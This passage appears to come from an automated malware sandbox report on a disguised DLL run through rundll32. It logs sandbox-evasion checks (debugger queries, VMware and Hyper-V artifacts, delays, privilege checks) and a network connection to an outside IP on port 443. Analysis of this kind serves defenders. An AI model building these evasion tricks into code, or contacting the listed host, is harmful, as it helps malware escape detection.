Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

graph_11-11610

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 9.1 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 6.5 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B4E5A4 FindFirstFileW,FindClose,	5_2_00B4E5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B4DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	5_2_00B4DFD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0426E5A4 FindFirstFileW,FindClose,	11_2_0426E5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0426DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	11_2_0426DFD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0040E5A4 FindFirstFileW,FindClose,	12_2_0040E5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0040DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	12_2_0040DFD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0040E5A4 FindFirstFileW,FindClose,	13_2_0040E5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0040DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	13_2_0040DFD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0446E5A4 FindFirstFileW,FindClose,	14_2_0446E5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0446DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	14_2_0446DFD8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_00B502F4 GetSystemInfo,

5_2_00B502F4

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

System process connects to network (likely due to code injection or exploit)

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: rundll32.exe, 0000000B.00000002.2285349012.0000000000792000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2285349012.00000000007E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_5-9248
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_11-12761
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_12-12477
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_13-9368
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_14-9174

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 3.5.233.174 443

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_044A21C4 ShellExecuteW,

11_2_044A21C4

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 5_2_00B48AC4 cpuid

5_2_00B48AC4

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	5_2_00B4E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00B4DB7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	11_2_0426E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_0426DB7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	12_2_0040E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_0040DB7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	13_2_0040E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_0040DB7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	14_2_0446E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_0446DB7C

